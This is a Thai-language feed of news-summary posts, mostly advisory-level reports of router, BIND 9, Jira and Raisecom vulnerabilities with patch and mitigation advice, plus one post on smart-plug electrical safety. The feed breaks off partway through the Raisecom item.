    🛡️ TP-Link เจอช่องโหว่ร้ายแรง – โค้ดดีบั๊กเก่ากลับมาอีกครั้ง เปิดช่องให้แฮกเกอร์เข้าถึง root ได้ TP-Link กำลังเผชิญกับปัญหาด้านความปลอดภัยครั้งใหญ่ เมื่อมีการค้นพบช่องโหว่ใหม่ 2 รายการในเราเตอร์รุ่น Omada และ Festa ซึ่งเปิดช่องให้แฮกเกอร์สามารถเข้าถึงระบบในระดับ root ได้ ช่องโหว่เหล่านี้ถูกติดตามในชื่อ CVE-2025-7850 และ CVE-2025-7851 โดยทีมวิจัยจาก Forescout’s Vedere Labs CVE-2025-7851 เกิดจากโค้ดดีบั๊กเก่าที่เคยถูกใช้ในช่องโหว่ CVE-2024-21827 แม้ TP-Link จะเคยออกแพตช์แก้ไขไปแล้ว แต่กลับมีโค้ดบางส่วนหลงเหลืออยู่ และสามารถถูกเรียกใช้งานได้อีกครั้งหากมีไฟล์ชื่อ image_type_debug อยู่ในระบบ ทำให้แฮกเกอร์สามารถเข้าสู่ระบบด้วยสิทธิ์ root ได้ ช่องโหว่อีกตัวคือ CVE-2025-7850 เกิดจากการจัดการข้อมูลในฟิลด์ private key ของ WireGuard VPN ไม่ดีพอ ทำให้ผู้ใช้ที่ผ่านการยืนยันตัวตนสามารถ inject คำสั่งเข้าสู่ระบบได้ และเมื่อใช้ร่วมกับช่องโหว่แรก จะสามารถควบคุมอุปกรณ์ได้อย่างสมบูรณ์ การค้นพบนี้ยังนำไปสู่การตรวจสอบเพิ่มเติม ซึ่งพบช่องโหว่อีก 15 รายการในอุปกรณ์ TP-Link รุ่นอื่นๆ ที่กำลังอยู่ในกระบวนการเปิดเผยและแก้ไขภายในต้นปี 2026 ✅ ช่องโหว่ใหม่ในเราเตอร์ TP-Link ➡️ CVE-2025-7851: โค้ดดีบั๊กเก่ากลับมาใช้งานได้อีกครั้ง ➡️ CVE-2025-7850: ช่องโหว่ใน WireGuard VPN ที่เปิดให้ inject คำสั่ง ➡️ ใช้ร่วมกันแล้วสามารถควบคุมอุปกรณ์ได้แบบ root access ➡️ พบในรุ่น Omada และ Festa ✅ การตรวจสอบเพิ่มเติม ➡️ พบช่องโหว่อีก 15 รายการในอุปกรณ์ TP-Link รุ่นอื่น ➡️ อยู่ในกระบวนการเปิดเผยและแก้ไขภายในต้นปี 2026 ➡️ แสดงถึงปัญหาการจัดการโค้ดและการแพตช์ที่ไม่สมบูรณ์ ✅ คำแนะนำจากผู้เชี่ยวชาญ ➡️ ควรอัปเดตเฟิร์มแวร์ทันทีเมื่อมีแพตช์ออก ➡️ ปิดการเข้าถึงจากระยะไกลหากไม่จำเป็น ➡️ ตรวจสอบ log เครือข่ายเพื่อหาสัญญาณการโจมตี ‼️ ข้อควรระวังและความเสี่ยง ⛔ ช่องโหว่ CVE-2025-7850 อาจถูกโจมตีจากระยะไกลโดยไม่ต้องยืนยันตัวตน ⛔ การแพตช์ที่ไม่สมบูรณ์อาจเปิดช่องให้โค้ดเก่ากลับมาใช้งานได้อีก ⛔ อุปกรณ์ที่ดูเหมือนปลอดภัยอาจยังมีช่องโหว่ซ่อนอยู่ ⛔ การใช้ VPN โดยไม่ตรวจสอบความปลอดภัยอาจกลายเป็นช่องทางโจมตี https://www.techradar.com/pro/security/hidden-debug-code-returns-from-the-dead-as-tp-link-routers-face-a-wave-of-new-critical-root-access-flaws
    WWW.TECHRADAR.COM
    Routine fixes can sometimes introduce fresh attack paths
    Two new flaws expose weaknesses in TP-Link’s Omada and Festa routers
    0 Comments 0 Shares 102 Views 0 Reviews
  • Smart Plug ไม่ใช่ปลั๊กวิเศษ! 5 สิ่งต้องห้ามเสียบเด็ดขาด ถ้าไม่อยากเสี่ยงไฟไหม้หรือระบบล่ม

    ในยุคบ้านอัจฉริยะที่ทุกอย่างควบคุมผ่านมือถือได้ Smart Plug กลายเป็นอุปกรณ์ยอดนิยมที่ช่วยเปลี่ยนอุปกรณ์ธรรมดาให้กลายเป็นอุปกรณ์อัตโนมัติ เช่น ตั้งเวลาเปิดปิดไฟ หรือควบคุมพัดลมจากระยะไกล แต่รู้หรือไม่ว่า ไม่ใช่ทุกอย่างจะเสียบกับ Smart Plug ได้อย่างปลอดภัย?

    บทความจาก SlashGear ได้เตือนว่า มีอุปกรณ์ 5 ประเภทที่ไม่ควรเสียบกับ Smart Plug เพราะอาจทำให้เกิดความเสียหายร้ายแรง ตั้งแต่ระบบล่มไปจนถึงไฟไหม้ และบางกรณีอาจถึงขั้นเป็นอันตรายต่อชีวิต

    สรุปสิ่งที่ห้ามเสียบกับ Smart Plug

    1️⃣. อุปกรณ์ที่ใช้พลังงานสูง (High-power appliances)
    ข้อเท็จจริง
    Smart Plug ส่วนใหญ่รองรับเพียง 10–15 แอมป์
    อุปกรณ์อย่างเครื่องซักผ้า ฮีตเตอร์ แอร์ ใช้พลังงานมากเกินไป
    การเสียบอุปกรณ์เหล่านี้อาจทำให้ปลั๊กร้อนเกินไปจนละลายหรือไฟไหม้

    คำเตือน
    ห้ามเสียบอุปกรณ์ที่ใช้พลังงานสูงต่อเนื่องเป็นเวลานาน
    หากจำเป็นต้องใช้ ควรเลือก Smart Plug แบบ heavy-duty ที่ออกแบบมาสำหรับโหลดสูง

    2️⃣. ระบบรักษาความปลอดภัย (Security systems)
    ข้อเท็จจริง
    ระบบกล้อง สัญญาณกันขโมย เซ็นเซอร์ ต้องการไฟฟ้าอย่างต่อเนื่อง
    Smart Plug อาจตัดไฟโดยไม่ตั้งใจ ทำให้ระบบหยุดทำงาน
    หากเชื่อมต่อผ่าน Wi-Fi อาจถูกแฮกและควบคุมจากระยะไกล

    คำเตือน
    การตัดไฟโดยไม่ตั้งใจอาจทำให้บ้านไม่มีระบบป้องกัน
    ควรใช้ปลั๊กไฟที่มีแหล่งจ่ายไฟสำรอง (UPS) แทน

    3️⃣. อุปกรณ์ทางการแพทย์ (Healthcare equipment)
    ข้อเท็จจริง
    อุปกรณ์เช่น เครื่องช่วยหายใจ เครื่องวัดความดัน ต้องการไฟฟ้าที่เสถียร
    Smart Plug ราคาถูกอาจไม่มีระบบความปลอดภัยที่เพียงพอ
    ความผิดพลาดอาจส่งผลถึงชีวิตผู้ป่วย

    คำเตือน
    ห้ามใช้ Smart Plug กับอุปกรณ์ที่เกี่ยวข้องกับสุขภาพโดยเด็ดขาด
    ระบบไฟฟ้าในโรงพยาบาลมีมาตรฐานสูงกว่าในบ้านทั่วไป

    4️⃣. อุปกรณ์ที่สร้างความร้อน (Appliances that generate heat)
    ข้อเท็จจริง
    อุปกรณ์เช่น เตาอบ ฮีตเตอร์ ไดร์เป่าผม ต้องการพลังงานสูงและควบคุมอุณหภูมิ
    หาก Wi-Fi หลุดหรือระบบล่ม อุปกรณ์อาจทำงานต่อโดยไม่หยุด
    เสี่ยงต่อการเกิดไฟไหม้หรือความเสียหายจากความร้อนสูง

    คำเตือน
    หลีกเลี่ยงการใช้ Smart Plug กับอุปกรณ์ที่อาจก่อให้เกิดอันตรายหากเปิดทิ้งไว้
    ควรเสียบกับปลั๊กผนังโดยตรงเพื่อความปลอดภัย

    5️⃣. อุปกรณ์ที่มีระบบควบคุมแบบแมนนวล (Devices with manual settings)
    ข้อเท็จจริง
    Smart Plug ควบคุมแค่การจ่ายไฟ ไม่สามารถควบคุมการทำงานของอุปกรณ์ได้
    อุปกรณ์ที่ต้องกดปุ่มเปิดหลังจากจ่ายไฟ เช่น เครื่องซักผ้า อาจไม่ทำงานแม้เสียบปลั๊กแล้ว
    การรีสตาร์ทอัตโนมัติหลังไฟดับอาจทำให้เกิดการทำงานผิดพลาด

    คำเตือน
    Smart Plug ไม่สามารถทำให้อุปกรณ์ที่ต้องกดปุ่มเปิดทำงานอัตโนมัติได้
    ควรใช้กับอุปกรณ์ที่มีฟังก์ชันเปิด/ปิดแบบง่าย เช่น โคมไฟ หรือพัดลม

    https://www.slashgear.com/2001326/never-plug-these-into-smart-plug/
    ⚡ Smart Plug ไม่ใช่ปลั๊กวิเศษ! 5 สิ่งต้องห้ามเสียบเด็ดขาด ถ้าไม่อยากเสี่ยงไฟไหม้หรือระบบล่ม ในยุคบ้านอัจฉริยะที่ทุกอย่างควบคุมผ่านมือถือได้ Smart Plug กลายเป็นอุปกรณ์ยอดนิยมที่ช่วยเปลี่ยนอุปกรณ์ธรรมดาให้กลายเป็นอุปกรณ์อัตโนมัติ เช่น ตั้งเวลาเปิดปิดไฟ หรือควบคุมพัดลมจากระยะไกล แต่รู้หรือไม่ว่า ไม่ใช่ทุกอย่างจะเสียบกับ Smart Plug ได้อย่างปลอดภัย? บทความจาก SlashGear ได้เตือนว่า มีอุปกรณ์ 5 ประเภทที่ไม่ควรเสียบกับ Smart Plug เพราะอาจทำให้เกิดความเสียหายร้ายแรง ตั้งแต่ระบบล่มไปจนถึงไฟไหม้ และบางกรณีอาจถึงขั้นเป็นอันตรายต่อชีวิต 🔍 สรุปสิ่งที่ห้ามเสียบกับ Smart Plug 1️⃣. อุปกรณ์ที่ใช้พลังงานสูง (High-power appliances) ✅ ข้อเท็จจริง ➡️ Smart Plug ส่วนใหญ่รองรับเพียง 10–15 แอมป์ ➡️ อุปกรณ์อย่างเครื่องซักผ้า ฮีตเตอร์ แอร์ ใช้พลังงานมากเกินไป ➡️ การเสียบอุปกรณ์เหล่านี้อาจทำให้ปลั๊กร้อนเกินไปจนละลายหรือไฟไหม้ ‼️ คำเตือน ⛔ ห้ามเสียบอุปกรณ์ที่ใช้พลังงานสูงต่อเนื่องเป็นเวลานาน ⛔ หากจำเป็นต้องใช้ ควรเลือก Smart Plug แบบ heavy-duty ที่ออกแบบมาสำหรับโหลดสูง 2️⃣. ระบบรักษาความปลอดภัย (Security systems) ✅ ข้อเท็จจริง ➡️ ระบบกล้อง สัญญาณกันขโมย เซ็นเซอร์ ต้องการไฟฟ้าอย่างต่อเนื่อง ➡️ Smart Plug อาจตัดไฟโดยไม่ตั้งใจ ทำให้ระบบหยุดทำงาน ➡️ หากเชื่อมต่อผ่าน Wi-Fi อาจถูกแฮกและควบคุมจากระยะไกล ‼️ คำเตือน ⛔ การตัดไฟโดยไม่ตั้งใจอาจทำให้บ้านไม่มีระบบป้องกัน ⛔ ควรใช้ปลั๊กไฟที่มีแหล่งจ่ายไฟสำรอง (UPS) แทน 3️⃣. อุปกรณ์ทางการแพทย์ (Healthcare equipment) ✅ ข้อเท็จจริง ➡️ อุปกรณ์เช่น เครื่องช่วยหายใจ เครื่องวัดความดัน ต้องการไฟฟ้าที่เสถียร ➡️ Smart Plug ราคาถูกอาจไม่มีระบบความปลอดภัยที่เพียงพอ ➡️ ความผิดพลาดอาจส่งผลถึงชีวิตผู้ป่วย ‼️ คำเตือน ⛔ ห้ามใช้ Smart Plug กับอุปกรณ์ที่เกี่ยวข้องกับสุขภาพโดยเด็ดขาด ⛔ ระบบไฟฟ้าในโรงพยาบาลมีมาตรฐานสูงกว่าในบ้านทั่วไป 4️⃣. อุปกรณ์ที่สร้างความร้อน (Appliances that generate heat) ✅ ข้อเท็จจริง ➡️ อุปกรณ์เช่น เตาอบ ฮีตเตอร์ ไดร์เป่าผม ต้องการพลังงานสูงและควบคุมอุณหภูมิ ➡️ หาก Wi-Fi หลุดหรือระบบล่ม อุปกรณ์อาจทำงานต่อโดยไม่หยุด ➡️ เสี่ยงต่อการเกิดไฟไหม้หรือความเสียหายจากความร้อนสูง ‼️ คำเตือน ⛔ หลีกเลี่ยงการใช้ Smart Plug กับอุปกรณ์ที่อาจก่อให้เกิดอันตรายหากเปิดทิ้งไว้ ⛔ ควรเสียบกับปลั๊กผนังโดยตรงเพื่อความปลอดภัย 5️⃣. อุปกรณ์ที่มีระบบควบคุมแบบแมนนวล (Devices with manual settings) ✅ ข้อเท็จจริง ➡️ Smart Plug ควบคุมแค่การจ่ายไฟ ไม่สามารถควบคุมการทำงานของอุปกรณ์ได้ ➡️ อุปกรณ์ที่ต้องกดปุ่มเปิดหลังจากจ่ายไฟ เช่น เครื่องซักผ้า อาจไม่ทำงานแม้เสียบปลั๊กแล้ว ➡️ การรีสตาร์ทอัตโนมัติหลังไฟดับอาจทำให้เกิดการทำงานผิดพลาด ‼️ คำเตือน ⛔ Smart Plug ไม่สามารถทำให้อุปกรณ์ที่ต้องกดปุ่มเปิดทำงานอัตโนมัติได้ ⛔ ควรใช้กับอุปกรณ์ที่มีฟังก์ชันเปิด/ปิดแบบง่าย เช่น โคมไฟ หรือพัดลม https://www.slashgear.com/2001326/never-plug-these-into-smart-plug/
    WWW.SLASHGEAR.COM
    Never Plug These 5 Things Into A Smart Plug - SlashGear
    Smart plugs are useful for bringing simple automations to appliances that aren't smart, but connecting them to those 5 things might not be a clever idea.
    0 Comments 0 Shares 91 Views 0 Reviews
  • DNS ระเบิดเวลา: ช่องโหว่ร้ายแรงใน BIND 9 เสี่ยงโจมตีแบบ Cache Poisoning และ DoS

    ถ้าคุณดูแลระบบ DNS ด้วย BIND 9 อยู่ล่ะก็ ข่าวนี้คือสัญญาณเตือนภัยไซเบอร์ที่คุณไม่ควรมองข้าม! Internet Systems Consortium (ISC) ได้ออกแพตช์อุดช่องโหว่ร้ายแรงถึง 3 รายการใน BIND 9 ซึ่งอาจเปิดทางให้แฮกเกอร์โจมตีแบบ cache poisoning และทำให้ระบบล่มได้แบบไม่ต้องยืนยันตัวตน

    ช่องโหว่ที่ร้ายแรงที่สุดคือ CVE-2025-40780 ซึ่งเกิดจากการใช้ pseudo-random number generator ที่ไม่ปลอดภัยในการเลือก source port และ query ID ทำให้แฮกเกอร์สามารถเดา transaction ID ได้ และส่งข้อมูลปลอมเข้าไปใน cache ของ DNS resolver ได้สำเร็จ

    อีกช่องโหว่หนึ่งคือ CVE-2025-40778 ที่เกิดจากการที่ BIND ยอมรับ resource records ที่ไม่ได้ร้องขอใน DNS response มากเกินไป ทำให้แฮกเกอร์สามารถแทรกข้อมูลปลอมเข้าไปใน cache ได้เช่นกัน

    ช่องโหว่สุดท้ายคือ CVE-2025-8677 ที่สามารถทำให้ CPU ของเซิร์ฟเวอร์หมดแรงได้ ด้วยการส่ง DNSKEY records ที่ถูกออกแบบมาอย่างเจาะจงให้ระบบทำงานหนักจนล่ม

    แม้ช่องโหว่เหล่านี้จะไม่กระทบกับ authoritative servers แต่ recursive resolvers กลับตกอยู่ในความเสี่ยงสูง และสามารถถูกโจมตีจากระยะไกลได้ทันทีหากยังไม่ได้อัปเดตแพตช์

    ช่องโหว่ที่ค้นพบใน BIND 9
    CVE-2025-40780: ใช้ pseudo-random ที่ไม่ปลอดภัย ทำให้เดา query ID ได้
    CVE-2025-40778: ยอมรับ resource records ที่ไม่ได้ร้องขอมากเกินไป
    CVE-2025-8677: ส่ง DNSKEY records ที่ทำให้ CPU ทำงานหนักจนล่ม

    เวอร์ชันที่ได้รับผลกระทบ
    BIND 9.11.0 → 9.16.50
    BIND 9.18.0 → 9.18.39
    BIND 9.20.0 → 9.20.13
    BIND 9.21.0 → 9.21.12

    วิธีการโจมตี
    ไม่ต้องยืนยันตัวตน
    ส่งข้อมูลปลอมผ่าน DNS response
    ใช้ zone ที่ออกแบบมาให้ทำให้ CPU ทำงานหนัก

    การแก้ไขจาก ISC
    ออกแพตช์ใหม่: 9.18.41, 9.20.15, 9.21.14
    แนะนำให้อัปเดตทันที

    คำเตือนสำหรับผู้ดูแลระบบ DNS
    หากยังไม่อัปเดต BIND อาจถูกโจมตีจากระยะไกลได้ทันที
    Cache poisoning อาจทำให้ผู้ใช้ถูก redirect ไปยังเว็บไซต์ปลอม
    การโจมตีแบบ CPU exhaustion อาจทำให้ DNS resolver ล่มทั้งระบบ

    คำแนะนำเพิ่มเติม
    ตรวจสอบว่าใช้เวอร์ชันที่ได้รับผลกระทบหรือไม่
    อัปเดตเป็นเวอร์ชันที่ได้รับการแก้ไขโดยเร็ว
    เฝ้าระวังการเปลี่ยนแปลงใน DNS cache และการทำงานของ CPU

    https://securityonline.info/isc-patches-multiple-high-severity-bind-vulnerabilities-enabling-cache-poisoning-and-denial-of-service-attacks/
    🧨 DNS ระเบิดเวลา: ช่องโหว่ร้ายแรงใน BIND 9 เสี่ยงโจมตีแบบ Cache Poisoning และ DoS ถ้าคุณดูแลระบบ DNS ด้วย BIND 9 อยู่ล่ะก็ ข่าวนี้คือสัญญาณเตือนภัยไซเบอร์ที่คุณไม่ควรมองข้าม! Internet Systems Consortium (ISC) ได้ออกแพตช์อุดช่องโหว่ร้ายแรงถึง 3 รายการใน BIND 9 ซึ่งอาจเปิดทางให้แฮกเกอร์โจมตีแบบ cache poisoning และทำให้ระบบล่มได้แบบไม่ต้องยืนยันตัวตน ช่องโหว่ที่ร้ายแรงที่สุดคือ CVE-2025-40780 ซึ่งเกิดจากการใช้ pseudo-random number generator ที่ไม่ปลอดภัยในการเลือก source port และ query ID ทำให้แฮกเกอร์สามารถเดา transaction ID ได้ และส่งข้อมูลปลอมเข้าไปใน cache ของ DNS resolver ได้สำเร็จ อีกช่องโหว่หนึ่งคือ CVE-2025-40778 ที่เกิดจากการที่ BIND ยอมรับ resource records ที่ไม่ได้ร้องขอใน DNS response มากเกินไป ทำให้แฮกเกอร์สามารถแทรกข้อมูลปลอมเข้าไปใน cache ได้เช่นกัน ช่องโหว่สุดท้ายคือ CVE-2025-8677 ที่สามารถทำให้ CPU ของเซิร์ฟเวอร์หมดแรงได้ ด้วยการส่ง DNSKEY records ที่ถูกออกแบบมาอย่างเจาะจงให้ระบบทำงานหนักจนล่ม แม้ช่องโหว่เหล่านี้จะไม่กระทบกับ authoritative servers แต่ recursive resolvers กลับตกอยู่ในความเสี่ยงสูง และสามารถถูกโจมตีจากระยะไกลได้ทันทีหากยังไม่ได้อัปเดตแพตช์ ✅ ช่องโหว่ที่ค้นพบใน BIND 9 ➡️ CVE-2025-40780: ใช้ pseudo-random ที่ไม่ปลอดภัย ทำให้เดา query ID ได้ ➡️ CVE-2025-40778: ยอมรับ resource records ที่ไม่ได้ร้องขอมากเกินไป ➡️ CVE-2025-8677: ส่ง DNSKEY records ที่ทำให้ CPU ทำงานหนักจนล่ม ✅ เวอร์ชันที่ได้รับผลกระทบ ➡️ BIND 9.11.0 → 9.16.50 ➡️ BIND 9.18.0 → 9.18.39 ➡️ BIND 9.20.0 → 9.20.13 ➡️ BIND 9.21.0 → 9.21.12 ✅ วิธีการโจมตี ➡️ ไม่ต้องยืนยันตัวตน ➡️ ส่งข้อมูลปลอมผ่าน DNS response ➡️ ใช้ zone ที่ออกแบบมาให้ทำให้ CPU ทำงานหนัก ✅ การแก้ไขจาก ISC ➡️ ออกแพตช์ใหม่: 9.18.41, 9.20.15, 9.21.14 ➡️ แนะนำให้อัปเดตทันที ‼️ คำเตือนสำหรับผู้ดูแลระบบ DNS ⛔ หากยังไม่อัปเดต BIND อาจถูกโจมตีจากระยะไกลได้ทันที ⛔ Cache poisoning อาจทำให้ผู้ใช้ถูก redirect ไปยังเว็บไซต์ปลอม ⛔ การโจมตีแบบ CPU exhaustion อาจทำให้ DNS resolver ล่มทั้งระบบ ‼️ คำแนะนำเพิ่มเติม ⛔ ตรวจสอบว่าใช้เวอร์ชันที่ได้รับผลกระทบหรือไม่ ⛔ อัปเดตเป็นเวอร์ชันที่ได้รับการแก้ไขโดยเร็ว ⛔ เฝ้าระวังการเปลี่ยนแปลงใน DNS cache และการทำงานของ CPU https://securityonline.info/isc-patches-multiple-high-severity-bind-vulnerabilities-enabling-cache-poisoning-and-denial-of-service-attacks/
    SECURITYONLINE.INFO
    ISC Patches Multiple High-Severity BIND Vulnerabilities Enabling Cache Poisoning and Denial of Service Attacks
    The Internet Systems Consortium (ISC) has issued patches for three high-severity vulnerabilities impacting the BIND 9 DNS server,
    0 Comments 0 Shares 91 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-22167 ใน Jira – เขียนไฟล์ลงเซิร์ฟเวอร์ได้ตามใจ! เสี่ยง RCE หากใช้ร่วมกับช่องโหว่อื่น”

    Atlassian ออกแพตช์ด่วนหลังพบช่องโหว่ร้ายแรงใน Jira Software และ Jira Service Management ทั้งเวอร์ชัน Data Center และ Server โดยช่องโหว่นี้มีรหัสว่า CVE-2025-22167 และได้คะแนน CVSS สูงถึง 8.7

    ช่องโหว่นี้เป็นแบบ Path Traversal + Arbitrary File Write ซึ่งเปิดให้ผู้โจมตีที่เข้าถึง web interface ของ Jira สามารถเขียนไฟล์ใด ๆ ลงใน path ที่ JVM process มีสิทธิ์เขียนได้ โดยไม่ต้องมีสิทธิ์ระดับ admin หรือการยืนยันตัวตนพิเศษ

    แม้ช่องโหว่นี้จะไม่ใช่ RCE โดยตรง แต่หากใช้ร่วมกับช่องโหว่อื่น เช่น การอัปโหลดไฟล์ JSP หรือการเปลี่ยน config ก็สามารถนำไปสู่การรันคำสั่งจากระยะไกลได้ทันที

    ช่องโหว่นี้ส่งผลกระทบต่อ Jira Software เวอร์ชัน 9.12.0 ถึง 11.0.0 และ Jira Service Management เวอร์ชัน 5.12.0 ถึง 10.3.0 โดย Atlassian ได้ออกแพตช์ในเวอร์ชัน 9.12.28+, 10.3.12+, 11.1.0+ และ 5.12.29+, 10.3.12+ ตามลำดับ

    Atlassian แนะนำให้ผู้ใช้รีบอัปเดตทันที หรืออย่างน้อยให้อัปเกรดเป็นเวอร์ชันที่มีแพตช์แล้ว หากไม่สามารถอัปเดตได้ทันที ควรจำกัดสิทธิ์การเขียนของ JVM process และตรวจสอบการเข้าถึง web interface อย่างเข้มงวด

    รายละเอียดช่องโหว่ CVE-2025-22167
    เป็นช่องโหว่แบบ Path Traversal + Arbitrary File Write
    เปิดให้เขียนไฟล์ใด ๆ ลงใน path ที่ JVM process เขียนได้
    ไม่ต้องใช้สิทธิ์ admin หรือการยืนยันตัวตนพิเศษ
    ได้คะแนน CVSS สูงถึง 8.7
    อาจนำไปสู่ RCE หากใช้ร่วมกับช่องโหว่อื่น

    ผลกระทบต่อผลิตภัณฑ์ Atlassian
    Jira Software เวอร์ชัน 9.12.0–11.0.0
    Jira Service Management เวอร์ชัน 5.12.0–10.3.0
    แพตช์ออกในเวอร์ชัน 9.12.28+, 10.3.12+, 11.1.0+
    และ 5.12.29+, 10.3.12+ สำหรับ Service Management

    แนวทางการป้องกัน
    อัปเดต Jira เป็นเวอร์ชันที่มีแพตช์ทันที
    หากอัปเดตไม่ได้ ควรจำกัดสิทธิ์การเขียนของ JVM
    ตรวจสอบการเข้าถึง web interface อย่างเข้มงวด
    เฝ้าระวังการเปลี่ยนแปลงไฟล์ config และ JSP

    ข้อควรระวังและคำเตือน
    ช่องโหว่นี้อาจถูกใช้ร่วมกับช่องโหว่อื่นเพื่อทำ RCE
    การเขียนไฟล์ลงใน path สำคัญอาจเปลี่ยนพฤติกรรมของระบบ
    ผู้โจมตีสามารถใช้เพื่อฝัง backdoor หรือเปลี่ยน config
    หากไม่อัปเดต อาจเสี่ยงต่อการถูกควบคุมระบบทั้งหมด
    ควรตรวจสอบ log การเขียนไฟล์ย้อนหลังเพื่อหาพฤติกรรมผิดปกติ

    https://securityonline.info/jira-path-traversal-flaw-cve-2025-22167-allows-arbitrary-file-write-on-server-data-center/
    🧩 “ช่องโหว่ CVE-2025-22167 ใน Jira – เขียนไฟล์ลงเซิร์ฟเวอร์ได้ตามใจ! เสี่ยง RCE หากใช้ร่วมกับช่องโหว่อื่น” Atlassian ออกแพตช์ด่วนหลังพบช่องโหว่ร้ายแรงใน Jira Software และ Jira Service Management ทั้งเวอร์ชัน Data Center และ Server โดยช่องโหว่นี้มีรหัสว่า CVE-2025-22167 และได้คะแนน CVSS สูงถึง 8.7 ช่องโหว่นี้เป็นแบบ Path Traversal + Arbitrary File Write ซึ่งเปิดให้ผู้โจมตีที่เข้าถึง web interface ของ Jira สามารถเขียนไฟล์ใด ๆ ลงใน path ที่ JVM process มีสิทธิ์เขียนได้ โดยไม่ต้องมีสิทธิ์ระดับ admin หรือการยืนยันตัวตนพิเศษ แม้ช่องโหว่นี้จะไม่ใช่ RCE โดยตรง แต่หากใช้ร่วมกับช่องโหว่อื่น เช่น การอัปโหลดไฟล์ JSP หรือการเปลี่ยน config ก็สามารถนำไปสู่การรันคำสั่งจากระยะไกลได้ทันที ช่องโหว่นี้ส่งผลกระทบต่อ Jira Software เวอร์ชัน 9.12.0 ถึง 11.0.0 และ Jira Service Management เวอร์ชัน 5.12.0 ถึง 10.3.0 โดย Atlassian ได้ออกแพตช์ในเวอร์ชัน 9.12.28+, 10.3.12+, 11.1.0+ และ 5.12.29+, 10.3.12+ ตามลำดับ Atlassian แนะนำให้ผู้ใช้รีบอัปเดตทันที หรืออย่างน้อยให้อัปเกรดเป็นเวอร์ชันที่มีแพตช์แล้ว หากไม่สามารถอัปเดตได้ทันที ควรจำกัดสิทธิ์การเขียนของ JVM process และตรวจสอบการเข้าถึง web interface อย่างเข้มงวด ✅ รายละเอียดช่องโหว่ CVE-2025-22167 ➡️ เป็นช่องโหว่แบบ Path Traversal + Arbitrary File Write ➡️ เปิดให้เขียนไฟล์ใด ๆ ลงใน path ที่ JVM process เขียนได้ ➡️ ไม่ต้องใช้สิทธิ์ admin หรือการยืนยันตัวตนพิเศษ ➡️ ได้คะแนน CVSS สูงถึง 8.7 ➡️ อาจนำไปสู่ RCE หากใช้ร่วมกับช่องโหว่อื่น ✅ ผลกระทบต่อผลิตภัณฑ์ Atlassian ➡️ Jira Software เวอร์ชัน 9.12.0–11.0.0 ➡️ Jira Service Management เวอร์ชัน 5.12.0–10.3.0 ➡️ แพตช์ออกในเวอร์ชัน 9.12.28+, 10.3.12+, 11.1.0+ ➡️ และ 5.12.29+, 10.3.12+ สำหรับ Service Management ✅ แนวทางการป้องกัน ➡️ อัปเดต Jira เป็นเวอร์ชันที่มีแพตช์ทันที ➡️ หากอัปเดตไม่ได้ ควรจำกัดสิทธิ์การเขียนของ JVM ➡️ ตรวจสอบการเข้าถึง web interface อย่างเข้มงวด ➡️ เฝ้าระวังการเปลี่ยนแปลงไฟล์ config และ JSP ‼️ ข้อควรระวังและคำเตือน ⛔ ช่องโหว่นี้อาจถูกใช้ร่วมกับช่องโหว่อื่นเพื่อทำ RCE ⛔ การเขียนไฟล์ลงใน path สำคัญอาจเปลี่ยนพฤติกรรมของระบบ ⛔ ผู้โจมตีสามารถใช้เพื่อฝัง backdoor หรือเปลี่ยน config ⛔ หากไม่อัปเดต อาจเสี่ยงต่อการถูกควบคุมระบบทั้งหมด ⛔ ควรตรวจสอบ log การเขียนไฟล์ย้อนหลังเพื่อหาพฤติกรรมผิดปกติ https://securityonline.info/jira-path-traversal-flaw-cve-2025-22167-allows-arbitrary-file-write-on-server-data-center/
    SECURITYONLINE.INFO
    Jira Path Traversal Flaw (CVE-2025-22167) Allows Arbitrary File Write on Server/Data Center
    Atlassian patched a Critical (CVSS 8.7) Path Traversal flaw (CVE-2025-22167) in Jira Software/Service Management that allows attackers to perform arbitrary file writes. Immediate update is urged.
    0 Comments 0 Shares 117 Views 0 Reviews
  • “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!”

    CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย

    ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel

    อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709

    ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง

    แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที

    รายละเอียดช่องโหว่ CVE-2025-11534
    เกิดจากการ bypass authentication ใน SSH
    ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login
    ได้คะแนน CVSS v3.1 สูงถึง 9.8
    จัดอยู่ในหมวด CWE-288 โดย CISA
    ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน

    การค้นพบและการเปิดเผย
    ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero
    แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ
    Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ
    ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน

    แนวทางการป้องกันจาก CISA
    แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ
